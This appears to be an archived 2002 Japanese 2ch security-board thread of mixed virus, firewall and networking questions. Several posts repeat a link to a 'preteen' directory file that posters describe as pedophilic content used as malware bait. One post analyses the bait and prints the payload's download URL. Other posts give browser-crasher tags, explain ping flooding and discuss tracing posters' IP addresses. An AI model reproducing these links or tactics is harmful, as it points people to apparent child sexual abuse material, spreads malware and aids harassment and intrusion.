それを開いたときネットに繋がり３分ぐらい繋げてました。
おかしすぎなので切ったらこんなのにナリマシタ。
現在「表示されました」なのにハードディスクが回っています。
イタイです・・・

>729
CD起動でアンチウィルスかけてみろい

行いました＞７３０

現在「初級ネットワーク＠2ch掲示板」でも聞いているのですが。

【1:3】ノートンアンチウイルスがおかしいです。
1 名前：イタイ 02/02/03 04:03 ID:oU9nxv9H
何度再インストールしてもダメです。
アンインストールもダメです。
アンインストールもできません。
フォルダいじってもダメです。
実行したら１分たたないうちに自然に終了です。
ハードディスクが廻っています・・・
泣けます。
助けてください。
ネットに繋ぐのは痛いです。




2 名前：　 ：02/02/03 04:09 ID:QxNt4Sk1
>1
君の文章も痛い。シマンテックのサポートに相談しろ。


3 名前：イタイ ：02/02/03 04:12 ID:oU9nxv9H
あの、うちはマジレスですが。
シマンテックに相談するのであればパソコンリフォームします。
ネタではありません。
ホントに困っています。

です。

>>728
(ﾟдﾟ)ﾊｧ?

4 名前：イタイ ：02/02/03 04:19 ID:oU9nxv9H
あのー誰かいませんか？
うちではシマンテックへレポートも提出出来ません。
即切れ、消滅です。

こんなの初めてです

>>717-728
オマエラ神ですか？

>>734
そのエロスクリーンセイバーってどれ？
試しに私もノートンなんでやってみるよ（にやり）

送信の表示は無いのですが、更新するごと、ブラウザ開くことにハードが
回ります。
キャッシュは５００有りますしいっつも消してますクッキーも
それでもダメです。

ブラウザ開くとき２段階でｉｐいってます。
表示が早くオッシュ賭けられません
どうすれば？

>>728
java使ってip抜いてポートスキャンかけるが正解

簡単にIP抜かれるものでしょうか？
別に抜かれても悪さしてなかったら問題ないのですか？

738 名前：名無しさん＠お腹いっぱい。 ：02/02/03 04:32
>>728
java使ってip抜いてポートスキャンかけるが正解

↑
おまえも728と大差ないな　わらい

>>739
今時ログ取って無いＢＢＳなんてあるのかな？
それとも素のIPaddressて意味？

ＢＢＳの管理者ではなくて書き込んでいる人に
IP抜くみたいな事言っている人見かけるもので
実際はどうなんだろうと思い

>>742
板がないので例えば以下のチャットの例だと・・
http://www.ops.dti.ne.jp/~nao-maki/chat/2chat.htm

index.html挟んでないと・・・
http://www.ops.dti.ne.jp/~nao-maki/chat/

./2chat.txt だよね？

板アタックて相手と同じBBS借りてログの位置だの見ることからはじめるものでは？
（っと言ってみるテスト・・(^^;）
他にも色々方法はあるよね

遅くなりました。
D/Lしたとこ見つけました。

http://yahoo5briefcase.vr9.com/preteen/
の　ItFitsJustBarely.mpg..>
ファイルです。

凄く分かりやすかったです。参考になりました。
実際抜ける人もいるみたいですね。

で、どうですか？
「ペド」は普通ですが？
スクリーンセイバーに驚きました。

>>744
真面目にやってみようかと思ったけどやめとく

つーかロリですか・・
自業自得とあきらめなさい

やる気も失せました(^^:::

接続中の人は早く切った方がよろしいかと。
うちは、それで逝きました。

ファイルの問題です。
初めは関係ないです。

ItFitsJustBarely.mpg..>


��このファイルです。

>>745
掲示板でも〜ですが、hoge.cgiならば「hoge.txt」/「hoge.log」/「hoge.dat」みたいにデフォルトで探す人もいるようで。

ＨＰにくる人のプライバシーの為にもログは外部から見えないところに置くのが管理人さんの最低限のサイト運営するうえでのマナーなのかも。。(^^;

っと偉そうに語ってみるテスト(^^;;;;

違うウイルスソフト買ってきた方がよろしいですか？

ちなみに先のD/Lしてらバスター2000は
２回ほど「ヤバイので修復します」と表示ありました。
うちは「完全」クリックして安心していました。
それから痛くなりました。

うちのショボイパソあんど頭では理解出来ません。
どうかよろしくお願いします。

あーあーなんか、「でぃすく」回りすぎ！
どこでログとってるんだ？
通信はありません。
ファイル置き場どこかわからん〜
あと、自分のパソコンの中だけでアクセスログ取れませんかね？

誰も

いないのか・・・

起きて全部リフォームでもしようかな？

だめか・・・

最後に・・・

http://yahoo5briefcase.vr9.com/preteen/
の　ItFitsJustBarely.mpg..>
ね。

ネタでは有りません。
それを解析してください・・・
＞「自分でしろ！」
って、無理です。
デリしかないねうちのﾊﾟｿｺﾝ
日曜日つぶれたか・・・

http://www.symantec.com/region/jp/sarcj/kill_cih.html
ほれ、駆除ツールだ。
ネタの出先ぐらい検索するかきちんと覚えておけ。
馬鹿め。

このscrファイル自体はウイルスではなく、起動させることによって
ttp://us.f1.yahoofs.com/users/9ac535af/bc/Result.exe?bc7EDq8AYCeuS0L1
からファイル（ウイルス本体）をダウンロードさせて実行させる。
ついでに[email protected]に実行したことを伝えるメールを送るものだと思われる。
送るメールの内容は「File+downloaded+successfully!」のようだ。

まあ、調べ物の出来ない厨房はjpgだけ落としてなさいってこった。

759のURLは行かないように。
Multi Doropper-BG（ウイルススキャンでの呼び名）が実行されるからね。
最新のDATファイルじゃないと検出できないから気をつけて。

Sygateを導入したのですが、
外からの攻撃が全く無いのか、Sygateは何も反応しません。
BlacckICeをいれてた時は、一日３回くらいの、
ポートスキャン等のアタックを感知してたのですが・・・。

SygateってBlacckICeみたいに自動的に攻撃を教えてくれないのでしょうか？

CドライブのWINDOWSのSYSTEMフォルダ内のkrnl386.exeが、
たびたび外部へアクセスしようと試みます。

ウイルスかと思い、グーグルで「krnl386.exe」「ウイルス」の２単語で
検索したところ、2chの過去ログを含め何件かHITしました。

ところが「REDTEAMというウイルスでは？」や「トロイの木馬だ」という発言や
「そのファイルが外部へアクセスするのは通常の動作。ウイルスではなく大丈夫」
という正反対の発言が幾つかあり、どちらがが正しいのかわかりません。

ノートンで検索しても（最新定義）検出されず、オンラインウイルスバスター
で検索しても、やはり検知されません。

シマンテックのサイト内検索で「krnl386.exe」や「REDTEAM」で検索しても
何もHITしません。ということは、ウイルスではないのでしょうか？

しかし、最近IEの動作が不安定で、頻繁に固まる症状も出ていて、
それと何らかの関連があるのかと不安です。

長文で申し訳ありません。ご存知の方いらっしゃいましたらお知恵をかしてください。

>>762
問題ないんじゃないの？
>最近IEの動作が不安定で、頻繁に固まる症状も出ていて
パソコンって、ちょっとDLLが壊れた、ちょっとレジストリが変、そういう不具合が重なっても案外生きているもの。気になるならOSを上書きインストールしてIE6入れたら？

>>762
http://www.google.com/search?q=cache:TeGHOKKIY_wC:www.aa.wakwak.com/~dalk/viruslog8.html+krnl386.exe&hl=ja

これとか？

>>764
一瞬ウイルスかと思ったんだけど、ノートンとバスター使って検出できないなら、ウイルスじゃないんじゃないかな、って考えて調べたんだけど。

Tinyとkrnl386.exeをキーワードにして調べたら、ドイツ語サイトでBootsで起きた例があった。そいえば、いずれにしても詳細書いてくれないとわからんよな。Tinyスレ1後半〜2前半に、同様の質問があったよ。

あのー、これヤバくないですか？さっき友達がこのサービス通じてデータ
送って来たんですけど。↓
http://www.filesend.to/
大阪ガスがやってる、要はファイルをブラウザでアップ、一時的に（3日間）
サーバーで預ってくれて、送りたい人に通知を出し、通知を受け取った人が
ダウンロードする、と。
100MBまで無料とはまた太っ腹。自分もこれから使おうかな〜、と思って
サービス内容調べて驚き。
送る側の本人認証しなさすぎ。なんと架空のアドレス入れても送れる。
通知を受け取った人には定型メールのヘッダーしか残らない。
覚えのない人からだったらダウンロードしないけど、送りたい奴の知り合いの
アドレス勝手に入れて、それらしい伝言文添えとけば疑わないだろ。
免責事項が書いてあるとはいえ、この御時世にいいのか！？悪用する気に
なればいくらでも・・・

スレッド式BBSだとどんなBBSでもIPはばれてしますのですか？

(ﾟДﾟ)ﾊｧ?

ＯＳ ＸＰの機能でネットワーク診断があるんですけど
自分にping打っても３３％のところで止まってしまいます。
ｾｷｭﾘﾃｨはすべてはずしているのですが

初めてこの板に来ました。どなたか相談に乗ってください。

MP3から
TROJ_MtX.A（隔離）　…というのと、
PE_Mtx.A（駆除）　…というのが見つかったんです。

で、outlook express が起動しないんです。
ちょこちょこエラーもでるんです。
ここ２、３日でTraceroute、Ping Attack、Smurfなど
された形跡もあるんです。

ほっといちゃマズイですよね？

>>770
MTXは感染時に、複数の実行ファイルを破壊してしまうから、それで起動できなくなるアプリが生じたかと。

上書きインストなんかじゃなくて、OSをクリーンインストール。

>>770
http://www.trendmicro.co.jp/mtx/tool.htm

朝早くにありがとうございました。
これを機会に勉強させてもらいます。

クリーンインストールですか。

>>773
駆除に成功してもどうせ、さまざまな実行ファイルが壊れているし。
例えばスキャンディスクが出来なくなったり、ワードが起動できなくなったりとか。

あ、すまん。scandisk.exeには感染しないかもしれん。自己レス。

ほう。
すると、最適化とかができないのも、コイツらの仕業…と。

駆除、修復ができれば
それ以上は壊れないですよね。

>>776
>最適化とかができないのも
それは知らない。単に断片化進みすぎていただけだったりして（笑
感染させて観察したときの経験談だけど、スキャンディスクは実行できたよ。あれは32ビットアプリじゃなかったのかな？

「それ以上は壊れない」のは確かかと。んじゃ、出勤してくる。

ブラウザクラッシュって何ですか？
タグですか？

>>778
タグではちょっと無理っぽい。
たいていは、JAVAScriptとかだね。
ページを閲覧すると新しい窓がどんどん開き、
リソース食い尽くしたWINがダウン（フリーズしたり）するように
しているもの。

<FRAME src="mailto:xxx"> とか <IMG src="mailto:xxx"> とか

779 名前：　 ：02/02/04 18:13
>>778
タグではちょっと無理っぽい。
たいていは、JAVAScriptとかだね。
ページを閲覧すると新しい窓がどんどん開き、
リソース食い尽くしたWINがダウン（フリーズしたり）するように
しているもの。

>>781
何を晒しあげてるのん？
無理ではないよと晒してるつもり？

HTMLタグだけじゃ軟弱なブラクラしか出来ないよ。

ブラクラは今のＰＣにとってはどれも軟弱

>>778
ひょっとして…、
■■■■■■掲示板への乱入者撃退法■■■■■■スレの14ですか？

２ｃｈに書き込むある人物について調べたいのですがどんなことが可能ですか？

Webメール上に送られてきたウイルスメールを読んでも、
PCにウイルスは感染するのでしょうか？

>>788
あるかもね
でも対策してれば問題ないでしょ

>>789さんありがとうございます。
WEB上でも感染するんですね。
勉強になりました。

シマンテックのオンラインスキャンで
Beckyの.bklがいくつか感染してるって言われたんだけど、
そのメールはもうゴミ箱に入れて、
しかもゴミ箱の中身は空にしてある。
何で消されてないの？

ちなみにAVGでスキャンしても反応なしだった。
みんなはAVGとInoculateIEってどっちが上手と思う？

>>791
一応考えられるのは
C:\_restoreに削除ファイルのコピー（システム復元用）を持つOSの場合
*.cpyファイルが感染した形になる。他にもノートンユーティリティ等、
ゴミ箱保護の機能をもったツール類で同様の症状が考えられるが…。

AVGが反応無いのは、たまたま検出できない種類？

どなたか知恵をわけて下さい。
もの凄く愚かな質問かもしれませんが

先程メールチェックしていましたら
ウイルスと思われる添付ファイルがわんさか来まして
バッドトランスが流行した頃から数百通は受信しているのですが
自分マックユーザーなので知らん顔でいたのですが
受信途中にフリーズしてしまいリセットボタンを押し、
再起動してするついでにデスクトップのファイルを再構築とか
いうのをしてみて立ち上がってみましたら
デスクトップのアイコンが全て「シンプルテキスト」の
姿に変身してしまってファイルも壊れてしまっているみたいなのです
そのようなウイルスを知っている方がいらっしゃったら
解決法など教えて下さい。

使っているマシンはG4 667　OSは9.1です。

キーボード打つ手がブルブル震えます…

　　　　これマジ……!?　とりあえず読んどけ……
　　　　　　　　　　　　　　 　　　　　　 　 ∧＿∧
　　　　　　　　　　　　　 　　　 ∧＿∧ （´∀｀　）
　　　　　　　　　　　 ∧＿∧ （´∀｀　）（　　　　）
　　　　　　∧＿∧ （´∀｀　）（　　　　）｜ ｜　|
　∧＿∧（´∀｀　）（　　　　）｜ ｜　| .（＿（＿）
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
http://www.puchiwara.com/hacking/

>>793
＞リセットボタンを押し・・再起動してするついでにデスクトップのファイルを再構築とか・・
この部分がマズかったのでは・・？

どちらにしてもマック系のvirusはそんなにないので・・

マジです。
今問題のマシンをノートンで見てますが
そのノートンのアイコンもシンプルテキストに変わってます

＞ゾイダーさん
明日本屋に逝きます。
ってことはこれやっぱ壊されたって事でしょうか
ブルブル…
やはり壊れたファイルはあきらめて
再インストールでしょうか…

>>792
レス遅くなりました。Nimdaって書くのも忘れてた・・・。
とりあえずHTMLメール表示はOFFにしてるし、
Beckyなら大丈夫とおもいこんでおります。
ただ、ファイル消したいけど消すとその日のメール全部消えちゃうみたいなので何か面倒くさい。
まとまってなくてすまそ。

リロードすれ…すんません

＞795さん
今迄の何度か再起動の度にこれやってたんですが
なんともなかったのでいつものようにしちゃいましたが
そうですか…そうかもそれませんね…
マックの板で聞いてみます有難うございます

>>796
そいつは、少し前からクソ本を盛んに宣伝しまくっている奴だ。

大変御無沙汰しています。教えていただきたいことがあります。
ＷＥＢはセミプロ程度、ＷＥＢ言語系は素人若干書き換え程度です。
現在、ボランティア系の団体で複数の応募フォーム、ＳＳＬＰＧＰクレジットカード引き落としなどを
使ったホームページを担当しています。
若干コーディングできる方から、簡易計算自動入力、曜日自動入力を強く勧められて以下の
スクリプトを頂きました。
曜日自動入力については、動作して入力欄がブランクでなく選択なので、安全上問題ない気がしますが、
自動計算に関して、動作もおかしく、それよりも入力欄ブランクで、タグその他
記述された場合、セキュリティ面でかなり不安なのですが、いかがでしょうか。
私個人としては、買物カゴ式の別ＣＧＩをあてる方が良いのではないかと思うのですが、
どうか教えて下さい。宜しく。 （長くて乗らないので一部除く）

<!-- saved from url=(0022)http://internet.e-mail -->
<HTML>
<HEAD><TITLE>簡単な入力検査の例</TITLE>
</HEAD>
<BODY>
<H3>簡単な例</H3><HR>
<FORM NAME="ValidForm">
5/18
<INPUT TYPE="TEXT" NAME="T0" SIZE="3">
人
<p>5/19
<input type="text" name="T1" size="3">
人</p>
<p>合計
<input type="text" name="T2" size="3">人</p>
<p>申込金（人数×2000円）<input type="text" name="T3" size="20">円</p>
<p>入金日　2002年<select size="1" name="D1">
<option value="1">1</option>
</select>月<select size="1" name="D2">
<option value="1">1</option>
</select>日<input type="text" name="T4" size="3">曜日</p>
<p>　</p>
</FORM>
</BODY>
</HTML>

>>800
マルチは消えてくれ

NIHONGOhenkan sitara furi-zusuru. HELP

教えて下さい。
私のHPにアクセス解析を付けてるのですが、
IPから何処まで情報が分かるんでしょうか？
プロバイダーは分かるのですが、エリアはどうやって調べれば分かるんでしょうか？

>>803
IPドメインサーチかけて、ホストネームみたら
アクセスポイントが推測できるのもある。

宣伝費が掛からなくていい！
>>794

>>805
売れてないよ。

IPドメインサーチはかけてみたんですけど、
エリアまでは出ないんで…

直接プロバイダーに聞いたら、エリアぐらいは教えて貰えるものなんでしょうか？

>>807
tracerouteかけるとわかる場合もある

>>807
荒らされたとか、事情にもよるんじゃない？

>>808
エリアでIPアドレスの範囲が固定されてるなら使えるかもね。
リアルタイムじゃなくてアクセスログからだと
赤の他人にアサインされてる可能性大だが。

>808さん
それは何でしょう？無知でごめんなさい…。
詳しく教えて頂けませんか？

>809さん
荒らされたって程でもないんで…やっぱり無理なんでしょうか

>>811
こことか。。。
http://www.annie.ne.jp/~ohode/ipadd/fuseiaccess.html

こういうのは「デキル」って人とかいるかもだけどまぁ地域位かなぁ

NeoTraceProってソフトとかで視覚的に地域とかだいたいわかったり・・

例えば>>808さんのはWindowsなら以下のリンクで。。
http://speed.serverisland.net/webs/hosoku/tracert.htm

地域わかったからどうこうって議論は別の話だけどね(^^;;;

これのほうが見やすいかな。。
http://www.atmarkit.co.jp/fnetwork/netcom/traceroute/traceroute.html

>810さん、812＝813さん
有り難うございます。ちょっと調べてみます。
お手数お掛けしてすみませんでした。

「とばし」の携帯ってなんですか？

>>815
板違い

ある掲示板に自分の名前がフルネームで使われていたんですが。自分は交友掲示板に書きこむ事自体今が久しぶりでアドレスも名前も載せたことは一度もないのに。こういうことは良くあることなんですか？対処法はないのでしょうか？

変なファイル（女の人の顔が出てきてキャーっていう）をダウンロードしてしまいまして
怖いので削除したいのですが、「このファイルはWindowsで使用されてるので削除
できません」と言われました。どうしたらいいですか？怖いです　たすけて

>>818
マルチじゃないなら答えたが彼方此方でやってると放置されまくるよ

今、C:\WINDOWS\TEMPフォルダに、killpixp.batっていう
ショートカットを見付けたんだけど、これって何でしょうか？
誰か、わかる人いませんか。

>>820
テキストのはずだから中身をアップしてくれないと…わかんないよ。

>>817
同姓同名の方なのでは？

情報・通信事典e-Wordsがハッキングされてんだけど。
もうみんな知ってた？

「hack by bixueboy」だとよ。

不便でかなわん。早く復旧しる！

>>823
結構質問スレで、「ここ見れ」に使っていたので困るなあ。
昨夜夕方ぐらいに、どっかの板の書き込みで知ったんで
結構長引いているね。あ、雑談っぽくなってしまった。

>>821

>テキストのはずだから中身をアップしてくれないと…わかんないよ。

HDの中を全部調べたのですが、見つかったのはショートカットのみで、
本体のバッチファイルがどこにも無いんです。

念の為、VB2001と、ANTIDOTEの最新定義ファイルで、ウィルスチェック
をしたのですが、何も検出されませんでした。
いったいこれは何なのでしょうか？

　

jjj

hhh

>>825=820
ショートカットだけじゃ…可能性は何でもありだね。

単に何かのアプリケーションのインストーラが残したもの
（自動実行型で解凍＆実行ファイル起動式のような）
かもしれないし…。

ややこしい名前のファイル生むインストーラに喝っ！

　

CATV(グローバルIP)にぶろばんルータを噛ませてNAT変換して使っています。
クライアントPCは全てDHCPで割り振られたローカルIPアドレスですが、
黒氷かゾヌを全クライアントPCにインストールする必要ってあるでしょうか？
また、現状ではどの程度安全だと思われますか？お願いします。

>>833
＞ルータでNAT変換の状態は、
ハッキングツールなどを使って無差別に対象を探すタイプの
比較的経験の浅いハッカーを完全にブロックできるでしょう。
個人用途のＰＣを対象にハッキングを試みるのは、たいていこのタイプ
ですので、それだけでもかなり安全になってると言えるはずです。

ルータそのものをハッキング対象に選んでNATテーブルを盗み出せるような
経験の高いハッカーにとっては、あなたのPCを狙うことは朝飯前でしょう。
あなた自身がそのような人に狙われる可能性を考えたとき、無いと思ったら
そのままでもいいし、危険だと思ったら別のセキュリティソフトなり導入
すれば良いことです。

可能性を考えるとバカらしい話ですが、たとえ個人事業でも顧客情報などを
扱っている場合は、万一でもそれを回避する責任はあるような気がします。

>>833 追加。
過失か故意かは問いませんが、あなた自身がトロイの木馬などを導入して
ルータの内側から送信してしまう分には、無防備だと思われます。
このことはルータの種類や設定にもよるでしょう。

アンチウイルスソフトの総合スレッドってどこかにあります？

ルータそのもののハッキングには太刀打ちできない。ということですね？
内部から外部へのパケット漏れには十分注意したいと思います。
分かりやすい説明ありがとうございました。

ところで、ルーティングテーブルを盗まれてしまった場合、
対象となるIPアドレスはどのように指定されることが予想されますか？

グローバルIP下のプライベートIPアドレスですよね？
XXX.XXX.XXX.XXX/\\hogehoge
で届いちゃいますか？

>>836
総合はないかな。とりあえずノートンかバスターでしょ。

☆ウィルス情報＆質問　総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/

【ノートン】Internet Security 2002 Ver.5
http://pc.2ch.net/test/read.cgi/sec/1011331626/

ウイルスバスター２００２ Part2
http://pc.2ch.net/test/read.cgi/sec/1009212569/

バスターＶＳノートン
http://pc.2ch.net/test/read.cgi/sec/1005050509/

マカフィーってだめなの！PART2
http://pc.2ch.net/test/read.cgi/sec/1007480057/

H+BEDV Antivir Personal Edition
http://pc.2ch.net/test/read.cgi/sec/1004122172/

AVG Anti-Virus
http://pc.2ch.net/test/read.cgi/sec/1001835534/

>>837
835氏じゃないけど・・・。
NATルータといってもいろいろで、多くの場合単純なPAT方式、
グローバルIPアドレス＋高位ポート→プライベートIPアドレス
のような変換だったと思います。だから…
XXX.XXX.XXX.XXX:XXXXX/\\hogehoge のようになるんでは？

なるほど！今度nifのアクセスポイントからダイヤルアップで
侵入を試してみます。ありがとうございました。

>>840
ちなみに簡易じゃなくて本当のNATだと、もっと複雑な変換ですので…。
その場合はよく知りません(^^;

無料で、高性能で、お試しなんかじゃない、
ウイルス殺しソフトが欲しい。
どこにあるか教えておくれなさい。

取り敢えず少し上のレスくらい読んだらどうだ？

>>842
「クレゾール」お勧め。
色んな奴駆除できて汎用性有るし。

アンチウイルスソフトは何がお勧め？

age

>>842
ＡＶＧとかＡｎｔｉｖｉｒとか（高性能かどうか知らんけど）
http://eazyfox.tripod.co.jp/
http://www.k-raito.com/other/virus/index.html

>845
まかふぃー or うぃるす警備隊

>>848
845さん、848はウソつきです。
漏れはＶ３（http://japan.ahnlab.com/）をお勧めします。
Ｖ３=最強　警備隊=糞

先日、急に外出先から仕事のメールを送る必要があって、ネット喫茶に駆け込み、
ふだん使っているNetscapeメールを起動させたのですが、設定ができないようになってたんです。
もちろんウェブメールという手があるのは知ってますが、
送信者のアドレス欄をちゃんと自分の会社アドレスにして送信したかったので、
ウェブメールでなく普通のメールソフトを使いたかったのですが…。
ネット喫茶って初めて入ったんですが、そういうメール送信はできないようにしてあるんですか？
何か方法があるのでしたら、ご教示ねがいます。
もしくは、送信者のアドレス欄を変更できるウェブメールというのがもしあれば教えてください。

できてもやめとけ〜　ひっこぬかれるぞ〜

>>851 恐山さん
仮にできた場合、送信後に履歴と設定内容を削除しておけば大丈夫、ということではないのでしょうか？
そもそも、ネット喫茶でメールソフトを使って送信すること自体、できる・できないのどちらでしょう？

>>852
できるよ
でもデータはゴミ箱入れただけじゃ完全には消えないしね
ネット喫茶の管理人や客が悪用するってことがないとも言えない

携帯電話から送ればいいでしょう　そんなときは

>>853
いまだにEメール機能のない携帯電話しか持ってないもんで…。
まぁセキュリティ上の危険性はあるにせよ、できるのはできるんですね。
このまえ入ったネット喫茶がたまたまできない店だったのかなぁ。

ttp://www.top.or.jp/~godhand/a2.html
これ開いちゃったんだけど、どうすればいいですか？

>>855
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣」　
―――――――――――――‐┬┘　
　　　　　　　　　　　 　 　 　 　 　 　 |　　
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |　　　
　　　　　|　 　 　 　 | 　 　 　 　|　　 |　　　
　　　　　|　 　 　 　 | ∧＿∧　|　　 |　　
　　　　　|　 　 　 　 |（　´∀｀）つ ミ |　. ┌=====┐
　　　　　|　 　 　 　 |/ ⊃　 ノ　|　　 |　　‖　PC　‖
　 　 　 　￣￣￣￣'￣￣￣￣　 　 |　　‖_＿＿ ‖
　　　　　　　　　　　　　　　　　　　 　　　└-──┘

ENV Checkerや診断君でリモートホストの所に
　自分が契約してるプロバイダのアドレスじゃなくて
　ルーターの設定をするアドレスが出るんですけど、どうしてでしょうか？

>>857
DHCP？
詳細が書かれないと、こっちもさっぱりわからん。

すいません。
　ENVCheckerのユーザー関連の情報、
　の所にあるリモートホストのアドレスをブラウザに打ちこむと、
　私の使ってるルーターの設定をする画面が出てくるのです。
　以前は契約していたプロバイダのアドレスが出ていたのですが、
　最近になってから急に表示されるようになって何故だろと。
　ちなみに、プロキシを通しても変化無しです。

>>859
それは、ルータの内側だから。
現在接続している場所（現ＩＰ=REMOTE_ADDR） の場所には、
ネットワークに直接接続している機器のIPアドレスが表示される。

（外からはアクセスできないから）まったく問題ないし、正常な状態。

以前見られなかったのは、気づいていなかったか、自動的に作成される
ルーティングテーブルが完成していなかったからだと思われ。

なるほど、特に心配しなくてもいい状態の様で安心しました。
　ご親切にありがとうございました。

この板にはURLを貼り付けて、そのファイルが危険かどうかを判定してもらうスレッドは無いのですか？
ラウンジのグロ画像判定スレのような。

MXでうｐされてるファイル全部をウィルスチェックしろと

>>862
ラウンジのスレじゃダメなの？ここそんなに人いないよ

サーバ用のパソコンにゾーンアラームを入れてたら
別のパソコンからWarFTPDにアクセスできません。
TinyFTPDでやってたときはできたのに・・・
だれかゾーンアラームを切らずに、WarFTPを使う方法知りませんか？

すいません。スレ違いでした･･･

pingアタックてなーに
pingアタックてなーに
pingアタックてなーに

【OSクラッシャー】ってどんなの？

>>867
ターゲットに向かってpingコマンド撃ちまくることＹＯ！

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　 　 　 　 　 　 　 |　　　OS
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |　　　を
　　　　　|　 　 　 　 | 　 　 　 　|　　 |　　　窓から
　　　　　|　 　 　 　 | ∧＿∧　|　　 |　　　投げ捨てろ
　　　　　|　 >>868 |（　´∀｀）つ ミ | 　 ＿
　　　　　|　 　 　 　 |/ ⊃　 ﾉ　|　　 |　 [＿]　←OS
　 　 　 　￣￣￣￣'￣￣￣￣　 　 | 　

ステートフルインスペクション方式ってふつうのパケットフィルタと
どう違うんですか？あとWin-XPのＦＷで、下のようなログはどういう
理由で破棄されているのですか？これってステートフル〜方式なのか？
よろしくお願いします。

#Verson: 1.0
#Software: Microsoft Internet Connection Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info

2002-02-04 00:03:55 CLOSE TCP 192.168.0.2 ***.***.***.*** 3364 80 - - - - - - - -
2002-02-04 00:03:55 DROP TCP ***.***.***.*** 192.168.0.2 80 3363 40 A 1598249167 1682646205 8465 - - -
2002-02-04 00:03:55 DROP TCP ***.***.***.*** 192.168.0.2 80 3363 40 A 1598249167 1682646206 8465 - - -
2002-02-04 00:03:55 DROP TCP ***.***.***.*** 192.168.0.2 80 3364 40 A 2355088590 1682685083 64240 - - -
2002-02-04 00:03:55 DROP TCP ***.***.***.*** 192.168.0.2 80 3364 40 A 2355088590 1682685084 64240 - - -
2002-02-04 00:03:56 DROP TCP ***.***.***.*** 192.168.0.2 80 3363 537 AP 1598249167 1682646206 8760 - - -
2002-02-04 00:03:56 DROP TCP ***.***.***.*** 192.168.0.2 80 3363 40 FA 1598249664 1682646206 8760 - - -
2002-02-04 00:03:56 OPEN TCP 192.168.0.2 ***.***.***.*** 3366 80 - - - - - - - -
2002-02-04 00:03:56 DROP TCP ***.***.***.*** 192.168.0.2 80 3364 40 FA 2355088590 1682685084 64240 - - -
2002-02-04 00:03:56 OPEN TCP 192.168.0.2 ***.***.***.*** 3366 80 - - - - - - - -
2002-02-04 00:03:58 DROP TCP ***.***.***.*** 192.168.0.2 80 3364 40 FA 2355088590 1682685084 64240 - - -
2002-02-04 00:03:59 DROP TCP ***.***.***.*** 192.168.0.2 80 3363 537 FAP 1598249167 1682646206 8760 - - -
2002-02-04 00:04:01 OPEN TCP 192.168.0.2 ***.***.***.*** 3363 80 - - - - - - - -

http://www.google.co.jp/search?q=%83X%83e%81%5B%83g%83t%83%8B%83C%83%93%83X%83y%83N%83V%83%87%83%93&hl=ja&lr=
おまえはくまさんが聖火をつけている画像を見たんかと問い詰めたい

質問じゃ無いので、sageで。

先日の体験談。
うっかり本体を壊してしまって、購入元の某大手量販店に持ち込み。
ところが、半月以上放置。1日で治る状態なのに何かがおかしい。
戻ってきたら、BIOS初期化、HDのブートレコード破損状態。
一体何をやられたんだろうか。

修理先にHDのデータ抜かれたりする危険性、今更ながらに気になった。
とりあえずセキュリティのネタということで、報告。

楽天市場落ちてない？

>>874
ハックされました
http://[email protected]/monkey_sugar.swf